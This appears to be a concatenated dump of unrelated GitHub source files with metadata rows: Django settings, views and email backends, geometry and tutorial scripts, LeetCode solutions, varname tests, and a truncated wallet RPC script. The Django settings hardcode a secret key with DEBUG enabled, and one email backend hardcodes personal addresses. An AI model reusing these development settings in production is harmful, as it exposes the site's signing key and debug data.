'malwarebazaar-comment-add': malwarebazaar_comment_add_command,
'malwarebazaar-samples-list': malwarebazaar_samples_list_command,
}
if command == 'test-module':
test_module(client)
elif command in commands:
return_results(commands[command](client, args))
else:
raise NotImplementedError(f'{command} command is not implemented.')
except Exception as e:
return_error(str(e))
if __name__ in ['__main__', 'builtin', 'builtins']:
main()
| [
"noreply@github.com"
] | demisto.noreply@github.com |
a8df33ce068e346562a4a9998cf2ad561eddae31 | cd3dea8520f5d1acfff7ff1f1cbad7b3b35140e5 | /data/UtilityGeography.py | 75ea2d0da182e0a4d70100e2ef45cc653b1e6c70 | [] | no_license | jtpils/ETH-Thesis | 1577ac30b902e9e61cccb8b6073e3d6a709b974a | 2584189da3304b5cad43043248090df12f5adcef | refs/heads/master | 2020-05-17T12:47:49.040323 | 2019-02-24T20:13:25 | 2019-02-24T20:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,230 | py | import math
import Config
config = Config.Config()
def lonLatToWorld(lon, lat):
# Truncating to 0.9999 effectively limits latitude to 89.189.
# This is about a third of a tile past the edge of the world tile.
siny = math.sin(float(lat) * math.pi / 180.0);
siny = min(max(siny, -0.9999), 0.9999)
return (
config.TILE_SIZE * (0.5 + float(lon) / 360.0),
config.TILE_SIZE * (0.5 - math.log((1 + siny) / (1 - siny)) / (4 * math.pi))
)
def lonLatToPixel(lon, lat, z, mode = 'int'):
assert(mode in ['int', 'float'])
scale = 2 ** z
wx, wy = lonLatToWorld(lon, lat)
if mode == 'int':
res = (math.floor(wx * scale), math.floor(wy * scale))
else:
res = (wx * scale, wy * scale)
return res
def lonLatToTile(lon, lat, z, mode = 'float'):
assert(mode in ['int', 'float'])
scale = 2 ** z
wx, wy = lonLatToWorld(lon, lat)
if mode == 'int':
res = (math.floor(wx * scale / config.TILE_SIZE), math.floor(wy * scale / config.TILE_SIZE))
else:
res = (wx * scale / config.TILE_SIZE, wy * scale / config.TILE_SIZE)
return res
def pixelToLonLat(px, py, z):
# Return the longitude of the left boundary of a pixel,
# and the latitude of the upper boundary of a pixel.
scale = 2 ** z
lon = (float(px) / float(scale) / config.TILE_SIZE - 0.5) * 360.0
temp = math.exp((0.5 - float(py) / float(scale) / config.TILE_SIZE) * 4 * math.pi)
lat = math.asin((temp - 1.0) / (temp + 1.0)) / math.pi * 180.0
return lon, lat
class BoundingBox(object):
def __init__(self, c_lon, c_lat, width, height, zoom, scale):
self.w, self.h = width, height
self.z = zoom + scale - 1
self.c_rpx, self.c_rpy = math.floor(width / 2), math.floor(height / 2)
self.c_px, self.c_py = lonLatToPixel(c_lon, c_lat, self.z)
self.tc_lon, self.tc_lat = self.relativePixelToLonLat(self.c_rpx, self.c_rpy)
def lonLatToRelativePixel(self, lon, lat, int_res = True):
px, py = lonLatToPixel(lon, lat, self.z, 'float')
if int_res:
return math.floor(px - self.c_px + self.c_rpx), math.floor(py - self.c_py + self.c_rpy)
else:
return px - self.c_px + self.c_rpx, py - self.c_py + self.c_rpy
def relativePixelToLonLat(self, x, y):
x = self.c_px + x - self.c_rpx
y = self.c_py + y - self.c_rpy
return pixelToLonLat(x, y, self.z)
| [
"li.zuoyue@foxmail.com"
] | li.zuoyue@foxmail.com |
3f6aac45b00af3515394080a54a03db8bede5095 | 341b8435b388d6ef40bdf44d676ba93727998dad | /modules/cli.py | a1b1ed830e4aa401ecabdccc764270fa1321731a | [
"MIT"
] | permissive | antipatico/pytoyir | 12abd31e9550d184b67c3ea26b906d0da868c0ce | ec87b51d5d6efd7d4449586d04093c7c49c4ac51 | refs/heads/master | 2020-04-19T17:20:43.672363 | 2019-01-30T11:53:06 | 2019-01-30T11:53:06 | 168,332,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | from .utils import lazyInt
def confirm(question):
print(question, "(y/N) ", end="")
return input() in ["y", "yes", "Y", "YES"]
def selectOptionsText(question, options):
while True:
r = range(len(options))
for i in r:
print(i, options[i])
selection = lazyInt(input(question))
if selection in r:
return options[selection]
| [
"14838767+antipatico@users.noreply.github.com"
] | 14838767+antipatico@users.noreply.github.com |
f4823491f0f44b3d340a720dbc47cf29a5a8e325 | 55540f3e86f1d5d86ef6b5d295a63518e274efe3 | /toolchain/riscv/MSYS/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d/libstdc++.a-gdb.py | 8e9d75e886ed14abcb55b187bbbe376b0ca67b81 | [
"Apache-2.0"
] | permissive | bouffalolab/bl_iot_sdk | bc5eaf036b70f8c65dd389439062b169f8d09daa | b90664de0bd4c1897a9f1f5d9e360a9631d38b34 | refs/heads/master | 2023-08-31T03:38:03.369853 | 2023-08-16T08:50:33 | 2023-08-18T09:13:27 | 307,347,250 | 244 | 101 | Apache-2.0 | 2023-08-28T06:29:02 | 2020-10-26T11:16:30 | C | UTF-8 | Python | false | false | 2,772 | py | # -*- python -*-
# Copyright (C) 2009-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/share/gcc-10.2.0/python'
libdir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--build-binary-packages--parameterized/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-10.2.0-2020.12.8-x86_64-w64-mingw32/riscv64-unknown-elf/lib/rv32imfdc_zba_zbb/ilp32d'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
| [
"jczhang@bouffalolab.com"
] | jczhang@bouffalolab.com |
177530b9da773539773055017d047774f865fb61 | 9bd373e7e273e5df973996732de63aa1c7fa316e | /leetcode/算法/2排序/347.py | 839ab2c38e7ab42f3a087f61f90637a6b8d3f1d6 | [] | no_license | chenchen1104/leetcode | 677609092143f3be628925ba3c9ee208e2e83e0a | 380a62257f09ffba36c1945de50d2c662f4caf12 | refs/heads/main | 2023-07-06T20:58:43.744852 | 2021-08-17T08:19:39 | 2021-08-17T08:19:39 | 397,168,193 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | import collections
import heapq
nums = [4, 3, 1, 6, 8, 2, 4, 9, 2]
k = 3
# 统计每个数字出现的次数
counter = collections.Counter(nums)
h = []
for key, val in counter.items():
print(h)
print(key, val)
heapq.heappush(h, (val, key))
if len(h) > k:
heapq.heappop(h)
print([x[1] for x in h])
| [
"noreply@github.com"
] | chenchen1104.noreply@github.com |
48917476b4e7a9e384dae9c11d27a8e7ba79d4ac | c33d8932d79ae2de58c72b49a7475fff04d3b8ed | /ccachurch/settings.py | 13c1c780fafd8b578cd466f9f61495d7b24fe26d | [] | no_license | ombwayomichael/ccachurch | 2448893e41daf63033a1251ad2b8be1591e18efb | 531e7aee7aade4c4fb525bbb5d1e93174cfcf064 | refs/heads/master | 2020-05-16T13:42:24.000046 | 2015-06-18T17:21:27 | 2015-06-18T17:21:27 | 37,673,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,855 | py | """
Django settings for ccachurch project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '385@_nie32x9*yde%gbusl4r4q0*cx06f&@r54q9^c1yh4n%r6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
SITE_ID=1
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'church',
'registration',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ccachurch.urls'
WSGI_APPLICATION = 'ccachurch.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
TEMPLATE_CONTEXT_PROCESSORS=(
'django.core.context_processors.media',
'django.contrib.auth.context_processors.auth',
)
STATIC_URL = '/static/'
TEMPLATE_DIRS=[os.path.join(BASE_DIR,'templates')]
STATICFILES_DIRS=[os.path.join(BASE_DIR,'static')]
MEDIA_URL='/media/'
MEDIA_ROOT=os.path.join(BASE_DIR,'media')
PHOTOLOGUE_DIR='photologue'
#PHOTOLOGUE_PATH=[os.path.join(BASE_DIR, 'photologue')]
REGISTRATION_OPEN = True # If True, users can register
ACCOUNT_ACTIVATION_DAYS = 7 # One-week activation window; you may, of course, use a different value.
REGISTRATION_AUTO_LOGIN = True # If True, the user will be automatically logged in.
LOGIN_REDIRECT_URL = '/church/' # The page you want users to arrive at after they successful log in
LOGIN_URL = '/accounts/login/'
| [
"michael.ombwayo@gmail.com"
] | michael.ombwayo@gmail.com |
40a108bdf9f73c90fcb8826f13c0a48876881f6f | cc5931ce51063e1ed34e3b6ae8965ffd88c8691d | /accounts/views.py | 16b0deb3804311ed17364f0273dddc0aaef682f1 | [] | no_license | Chetan45s/Django-Custom-User-Boilerplate | c94368bbf76bc0600152aeda9eb7659c41899e80 | ad332f35826d47075f9d20e332975d2dbbf3713d | refs/heads/main | 2023-07-13T22:55:48.219369 | 2021-08-16T10:24:15 | 2021-08-16T10:24:15 | 385,047,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,582 | py | from django.shortcuts import render,redirect
from django.contrib.auth import authenticate, login, get_user_model
from .forms import *
from django.utils.http import is_safe_url
def index(request):
return render(request,"index.html")
User = get_user_model()
def signup(request):
form = RegisterForm(request.POST or None)
context = {
"form": form
}
if form.is_valid():
print(form.cleaned_data)
# username = form.cleaned_data.get("username")
email = form.cleaned_data.get("email")
password = form.cleaned_data.get("password")
new_user = User.objects.create_user(email, password)
print(new_user)
return redirect("/")
return render(request, "signup.html", context)
def login_page(request):
form = LoginForm(request.POST or None)
context = {
"form": form
}
next_ = request.GET.get('next')
next_post = request.POST.get('next')
redirect_path = next_ or next_post or None
if form.is_valid():
print(form)
email = form.cleaned_data.get("email")
password = form.cleaned_data.get("password")
user = authenticate(request, email=email, password=password)
if user is not None:
login(request, user)
if is_safe_url(redirect_path, request.get_host()):
return redirect(redirect_path)
else:
return redirect("/")
else:
# Return an 'invalid login' error message.
print("Error")
return render(request, "login.html", context)
| [
"chetansalmotra45@gmail.com"
] | chetansalmotra45@gmail.com |
2e15c79c175d70946cde876076ace6ad5335cfbc | 7c014147f014536815830c16eedcda86695f35db | /Chap03/ex02_내장함수.py | 12b9d1bacece2ef63b242e15b66f595c396766e6 | [] | no_license | goodluck3586/python2020 | 436a6143a1b7031313fbe97da6cb245d3c7719ec | 7cf5ab0ff443f327aec9e99a7a137c812b67fafa | refs/heads/master | 2023-03-05T05:59:52.416481 | 2021-02-18T22:55:00 | 2021-02-18T22:55:00 | 295,363,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,014 | py | # 파이썬 내장 함수는 외부 모듈과 달리 import가 필요없다.
# type(object) => 자료형을 알려줌.
print(type("abcd")) # <class 'str'>
print(type([])) # <class 'list'>
# id(object) => 객체의 주소 값 반환
a = 3
print(id(a)) # 1893312464
print(type(a)) # <class 'int'>
# pow(x, y) => x를 y만큼 제곱한 결과 반환
print(pow(3, 4), pow(2, 3)) # 81 8
# sum(iterable) => 합계 반환
print(sum((1,2,3,4,5)), sum([1,2,3])) # 15 6
# max(열거형 자료), min(열거형 자료)
print(max([1,2,3]), max('python')) # 3, y
print(min([1,2,3]), min('python')) # 1, h
# round(number) => 반올림 수 반환
print(round(4.6)) # 5
print(round(4.1)) # 4
print(round(3.141592, 3)) # 3.142
# eval(계산 가능한 문자열) => 문자열을 계산한 결과값 반환
print(eval('1+2')) # 3
# list(열거형 자료) => 리스트 반환
print(list('python')) # ['p', 'y', 't', 'h', 'o', 'n']
print(list((1,2,3))) # [1, 2, 3]
# enumerate() => 열거형 자료형을 입력 받아 인덱스 값과 자료를 반환
for i, char in enumerate('python'):
print(i, char)
# filter(함수f, 열거형 자료) => 열거형 자료가 주어진 함수에서 실행되었때 참인 값만 반환
def positive(n):
return n>0
print(list(filter(positive, [-1, 3, 2, 0, -7, 9]))) # [3, 2, 9]
print(list(filter(lambda n: n>0, [-1, 3, 2, 0, -7, 9]))) # [3, 2, 9]
# map(함수f, 열거형 자료) => 함수f가 수행한 결과를 반환
def two_times(x):
return x*2
print(list(map(two_times, [1,2,3,4]))) # [2, 4, 6, 8]
print(list(map(lambda x: x*2, [1,2,3,4]))) # [2, 4, 6, 8]
# range([start], stop, [step]) => 입력받은 숫자에서 반복 가능한 객체 반환
print(list(range(5))) # [0, 1, 2, 3, 4]
print(list(range(1, 5))) # [1, 2, 3, 4]
print(list(range(1, 10, 2))) # [1, 3, 5, 7, 9]
# sorted(열거형 자료)
print(sorted([3, 1, 2])) # [1, 2, 3]
print(sorted('zero')) # ['e', 'o', 'r', 'z']
| [
"goodluck3586@gsm.hs.kr"
] | goodluck3586@gsm.hs.kr |
58d02aeb5201dc55547767b3a597b200ad59a0d3 | a529505a9a3382cc6a8274e15a01d8a523fffb64 | /procedural_cube.py | 6bc5adf2c9d55f514aaf3a6319b8aaf65818cb8b | [] | no_license | BhavyanshM/Simulations | 5c5fc451edccfd452613a9da850b45f1b01eb276 | 7565446b6023870a6d85f7a5f4bad0f732a4e43e | refs/heads/master | 2020-09-11T10:11:01.932586 | 2020-02-07T06:30:23 | 2020-02-07T06:30:23 | 222,031,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,999 | py | from direct.showbase.ShowBase import ShowBase
from direct.showbase.DirectObject import DirectObject
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from panda3d.core import *
import sys
import os
base = ShowBase()
# base.disableMouse()
base.camera.setPos(10, -100, 0)
# You can't normalize inline so this is a helper function
def normalized(*args):
myVec = LVector3(*args)
myVec.normalize()
return myVec
# helper function to make a square given the Lower-Left-Hand and
# Upper-Right-Hand corners
def makeSquare(x1, y1, z1, x2, y2, z2):
format = GeomVertexFormat.getV3n3cpt2()
vdata = GeomVertexData('square', format, Geom.UHDynamic)
vertex = GeomVertexWriter(vdata, 'vertex')
normal = GeomVertexWriter(vdata, 'normal')
color = GeomVertexWriter(vdata, 'color')
texcoord = GeomVertexWriter(vdata, 'texcoord')
# make sure we draw the sqaure in the right plane
if x1 != x2:
vertex.addData3(x1, y1, z1)
vertex.addData3(x2, y1, z1)
vertex.addData3(x2, y2, z2)
vertex.addData3(x1, y2, z2)
normal.addData3(normalized(2 * x1 - 1, 2 * y1 - 1, 2 * z1 - 1))
normal.addData3(normalized(2 * x2 - 1, 2 * y1 - 1, 2 * z1 - 1))
normal.addData3(normalized(2 * x2 - 1, 2 * y2 - 1, 2 * z2 - 1))
normal.addData3(normalized(2 * x1 - 1, 2 * y2 - 1, 2 * z2 - 1))
else:
vertex.addData3(x1, y1, z1)
vertex.addData3(x2, y2, z1)
vertex.addData3(x2, y2, z2)
vertex.addData3(x1, y1, z2)
normal.addData3(normalized(2 * x1 - 1, 2 * y1 - 1, 2 * z1 - 1))
normal.addData3(normalized(2 * x2 - 1, 2 * y2 - 1, 2 * z1 - 1))
normal.addData3(normalized(2 * x2 - 1, 2 * y2 - 1, 2 * z2 - 1))
normal.addData3(normalized(2 * x1 - 1, 2 * y1 - 1, 2 * z2 - 1))
# adding different colors to the vertex for visibility
color.addData4f(1.0, 0.0, 0.0, 1.0)
color.addData4f(1.0, 0.0, 0.0, 1.0)
color.addData4f(1.0, 0.0, 0.0, 1.0)
color.addData4f(1.0, 0.0, 0.0, 1.0)
# color.addData4f(0.0, 1.0, 0.0, 1.0)
# color.addData4f(0.0, 0.0, 1.0, 1.0)
# color.addData4f(1.0, 0.0, 1.0, 1.0)
# texcoord.addData2f(0.0, 1.0)
# texcoord.addData2f(0.0, 0.0)
# texcoord.addData2f(1.0, 0.0)
# texcoord.addData2f(1.0, 1.0)
# Quads aren't directly supported by the Geom interface
# you might be interested in the CardMaker class if you are
# interested in rectangle though
tris = GeomTriangles(Geom.UHDynamic)
tris.addVertices(0, 1, 3)
tris.addVertices(1, 2, 3)
square = Geom(vdata)
square.addPrimitive(tris)
return square
# Note: it isn't particularly efficient to make every face as a separate Geom.
# instead, it would be better to create one Geom holding all of the faces.
square0 = makeSquare(-1, 0, -1, 1, 0, 1)
square1 = makeSquare(-1, 1, -1, 1, 1, 1)
square2 = makeSquare(-1, 1, 1, 1, -1, 1)
square3 = makeSquare(-1, 1, -1, 1, -1, -1)
square4 = makeSquare(-1, -1, -1, -1, 1, 1)
square5 = makeSquare(1, -1, -1, 1, 1, 1)
snode = GeomNode('square')
snode.addGeom(square0)
# snode.addGeom(square1)
# snode.addGeom(square2)
# snode.addGeom(square3)
# snode.addGeom(square4)
# snode.addGeom(square5)
cube = render.attachNewNode(snode)
cube.hprInterval(1.5, (0, 360, 0)).loop()
# OpenGl by default only draws "front faces" (polygons whose vertices are
# specified CCW).
cube.setTwoSided(True)
class MyTapper(DirectObject):
def __init__(self):
# self.testTexture = loader.loadTexture("maps/envir-reeds.png")
# self.accept("1", self.toggleTex)
# self.accept("2", self.toggleLightsSide)
# self.accept("3", self.toggleLightsUp)
self.LightsOn = False
self.LightsOn1 = False
slight = Spotlight('slight')
slight.setColor((1, 1, 1, 1))
lens = PerspectiveLens()
slight.setLens(lens)
self.slnp = render.attachNewNode(slight)
self.slnp1 = render.attachNewNode(slight)
w, h = 1024*2, 768*2
props = WindowProperties()
props.setSize(w, h)
base.win.requestProperties(props)
# def toggleTex(self):
# global cube
# if cube.hasTexture():
# cube.setTextureOff(1)
# else:
# cube.setTexture(self.testTexture)
# def toggleLightsSide(self):
# global cube
# self.LightsOn = not self.LightsOn
# if self.LightsOn:
# render.setLight(self.slnp)
# self.slnp.setPos(cube, 10, -400, 0)
# self.slnp.lookAt(10, 0, 0)
# else:
# render.setLightOff(self.slnp)
# def toggleLightsUp(self):
# global cube
# self.LightsOn1 = not self.LightsOn1
# if self.LightsOn1:
# render.setLight(self.slnp1)
# self.slnp1.setPos(cube, 10, 0, 400)
# self.slnp1.lookAt(10, 0, 0)
# else:
# render.setLightOff(self.slnp1)
t = MyTapper()
base.run()
| [
"bhavyanshmishra@gmail.com"
] | bhavyanshmishra@gmail.com |
00b9b9559abc32c5f0c25f3ff1f65614b6b777f9 | dcf6b3c43965459e9648fc34209f7e0c681c4d41 | /07-Strings-Methods/the-find-and-index-methods.py | 91271dd4d28dce4e402ca2b6d7bc623771f0060c | [] | no_license | saulhappy/pythonLearning | 8e28cbebb16208cd04640baf641fc72039a4e756 | 4b80a6287279509581daa8617153144af3bf95d3 | refs/heads/master | 2022-12-11T08:36:20.863901 | 2020-09-02T20:12:51 | 2020-09-02T20:12:51 | 288,853,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | print("saul is learning python".find("y"))
print("saul is learning python".find("python"))
print("saul is learning python".find("s"))
print("saul is learning python".find("saul"))
print("saul is learning python".find("z"))
print("saul is learning python".find("s"))
print("saul is learning python".find("l"))
# start looking at index 5 of object
print("saul is learning python".find("l", 5))
# index works the same as find, but returns ValueError instead of -1 if it doesn't find anything.
| [
"646634@gmail.com"
] | 646634@gmail.com |
0d1bfe45270d76b88c774d848ede4a38ee8cb120 | 60364a7089bc359494a4a42ba6d79c2fd0b84185 | /django_extended/emailing/backend.py | ced758319243991dd06e01a4e9d2d45cbf3c16e2 | [
"BSD-3-Clause"
] | permissive | dalou/django-extended | 4936c77535bc4421a9f003da58a49629bc7996df | a7ba952ea7089cfb319b4615ae098579c9ab14f9 | refs/heads/master | 2021-10-27T09:33:28.615992 | 2015-12-14T14:55:33 | 2015-12-14T14:55:33 | 46,408,921 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address, DEFAULT_ATTACHMENT_MIME_TYPE
from django.core.mail.backends.smtp import EmailBackend
from .models import *
class DevBackend(EmailBackend):
def route_recipients(self, recipients):
for i,r in enumerate(recipients):
recipients[i] = "autrusseau.damien@gmail.com, adelineautrusseau@gmail.com"
return recipients
def _send(self, message):
orginial_receiver = ", ".join(message.to)
message.to = self.route_recipients(message.to)
message.cc = self.route_recipients(message.cc)
message.bcc = self.route_recipients(message.bcc)
message.subject += ' <orginal receivers : %s>' % orginial_receiver
super(DevBackend, self)._send(message)
class ProductionBackend(EmailBackend):
def route_recipients(self, recipients):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# receivers = ", ".join(list(set(TestEmail.objects.all().values_list('email', flat=True))))
# # for i,r in enumerate(recipients):
# # if not r.endswith('@%s' % PROJECT_DOMAIN):
# # recipients = settings.DEFAULT_FROM_EMAIL
return recipients
def _send(self, message):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# message.to = self.route_recipients(message.to)
# message.cc = self.route_recipients(message.cc)
# message.bcc = self.route_recipients(message.bcc)
super(ProductionBackend, self)._send(message) | [
"autrusseau.damien@gmail.com"
] | autrusseau.damien@gmail.com |
5ca0ec8dad238e96c49b6f3d9be34be18354dfcc | 461f1f8d92fc7397794b662526d2e6e1bab41fff | /tests/test_will.py | 86b92894329ea5f0b0b0f209e0da4dced1b0017d | [] | no_license | breuleux/python-varname | b467dfbfafd71410e2370408cc724455668f370c | 867e4aeec892915c496a31a19cfd933a6d67fc8a | refs/heads/master | 2023-07-06T15:59:05.221636 | 2021-07-07T07:04:08 | 2021-07-07T07:04:08 | 392,854,301 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,360 | py | import sys
import pytest
from varname import *
def test_will():
def i_will():
iwill = will()
func = lambda: 0
func.will = iwill
# return the function itself
# so that we can retrieve it after the attribute call
func.abc = func
return func
func = i_will().abc
assert func.will == 'abc'
assert getattr(func, 'will') == 'abc'
def test_will_deep():
def get_will():
return will(2)
def i_will():
iwill = get_will()
func = lambda: 0
func.will = iwill
# return the function itself
# so that we can retrieve it after the attribute call
func.abc = func
return func
func = i_will().abc
assert func.will == 'abc'
# issue #17
def test_will_property():
class C:
def __init__(self):
self.will = None
@property
def iwill(self):
self.will = will(raise_exc=False)
return self
def do(self):
return 'I will do something'
c = C()
c.iwill
assert c.will is None
result = c.iwill.do()
assert c.will == 'do'
assert result == 'I will do something'
def test_will_method():
class AwesomeClass:
def __init__(self):
self.wills = [None]
def __call__(self, *_):
return self
myself = __call__
__getattr__ = __call__
def permit(self, *_):
self.wills.append(will(raise_exc=False))
if self.wills[-1] is None:
raise AttributeError(
'Should do something with AwesomeClass object'
)
# let self handle do
return self
def do(self):
if self.wills[-1] != 'do':
raise AttributeError("You don't have permission to do")
return 'I am doing!'
__getitem__ = permit
awesome = AwesomeClass()
with pytest.raises(AttributeError) as exc:
awesome.do()
assert str(exc.value) == "You don't have permission to do"
with pytest.raises(AttributeError) as exc:
awesome.permit()
assert str(exc.value) == 'Should do something with AwesomeClass object'
# clear wills
awesome = AwesomeClass()
ret = awesome.permit().do()
assert ret == 'I am doing!'
assert awesome.wills == [None, 'do']
awesome = AwesomeClass()
ret = awesome.myself().permit().do()
assert ret == 'I am doing!'
assert awesome.wills == [None, 'do']
awesome = AwesomeClass()
ret = awesome().permit().do()
assert ret == 'I am doing!'
assert awesome.wills == [None, 'do']
awesome = AwesomeClass()
ret = awesome.attr.permit().do()
assert ret == 'I am doing!'
assert awesome.wills == [None, 'do']
awesome = AwesomeClass()
ret = awesome.permit().permit().do()
assert ret == 'I am doing!'
assert awesome.wills == [None, 'permit', 'do']
with pytest.raises(AttributeError) as exc:
print(awesome[2])
assert str(exc.value) == 'Should do something with AwesomeClass object'
ret = awesome[2].do()
assert ret == 'I am doing!'
def test_will_decorated():
def return_self(func):
def wrapper(self, *args, **kwargs):
func(self, *args, **kwargs)
return self
return wrapper
class Foo:
def __init__(self):
self.will = None
def get_will(self):
self.will = will(raise_exc=False)
return self
@return_self
def get_will_decor(self):
self.will = will(2, raise_exc=False)
def __getattr__(self, name):
return self.will
x = Foo().get_will().x
assert x == 'x'
x = Foo().get_will_decor().x
assert x == 'x'
def test_will_fail():
def get_will(raise_exc):
return will(raise_exc=raise_exc)
with pytest.raises(VarnameRetrievingError):
get_will(True)
the_will = get_will(False)
assert the_will is None
def test_frame_fail_will(no_getframe):
def func(raise_exc):
wil = will(raise_exc=raise_exc)
ret = lambda: None
ret.a = 1
ret.will = wil
return ret
with pytest.raises(VarnameRetrievingError):
func(True).a
assert func(False).a == 1
assert func(False).will is None
| [
"noreply@github.com"
] | breuleux.noreply@github.com |
9a7e6df18863e3a71f4ab3c48f3ae26bfe8d0508 | 0e8c3ce37766565d4a114c2e3b92aea9109caf02 | /Python/leetcode/Shift 2D array.py | 63ea2fce770f0e400455a53738913190b291875e | [] | no_license | NarglesCS/Library | c2f2694d5e2e0470010402f1cc361f4cc16587c2 | 2dc341e78a4ba28a45ec528591a5eb3f7581de75 | refs/heads/master | 2023-05-29T02:15:54.730443 | 2023-05-07T18:34:20 | 2023-05-07T18:34:20 | 262,146,390 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | class Solution:
def shiftGrid(self, grid: List[List[int]], k: int) -> List[List[int]]:
temp = [None,None]
for x in range(k):
for i in range(len(grid)):
if (i-1) == temp[0]:
grid[i].insert(0,temp[1])
if i != len(grid)-1:
#continue
temp = [i,grid[i].pop()]
if i == 0:
grid[i].insert(0,grid[len(grid)-1].pop())
return grid
| [
"noreply@github.com"
] | NarglesCS.noreply@github.com |
b3d2d3ace4ff60ad02e28788f44aac9e11d0864a | 564ca53b32db79e3a8638fd695ae9879dd312672 | /contrib/bitrpc/bitrpc.py | 5dc713f0d50363bb901b0fcb85efaefe7f6cdbd3 | [
"MIT"
] | permissive | ChilCoin/Chilcoin | 0a631efdbc8bf7576aaf3affba2b155623ea4460 | b76f5485b7875b5a490590ca2dac02141c450537 | refs/heads/master | 2020-04-06T06:59:31.066458 | 2014-09-10T01:47:01 | 2014-09-10T01:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,838 | py | from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:9442")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:9442")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Chilcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
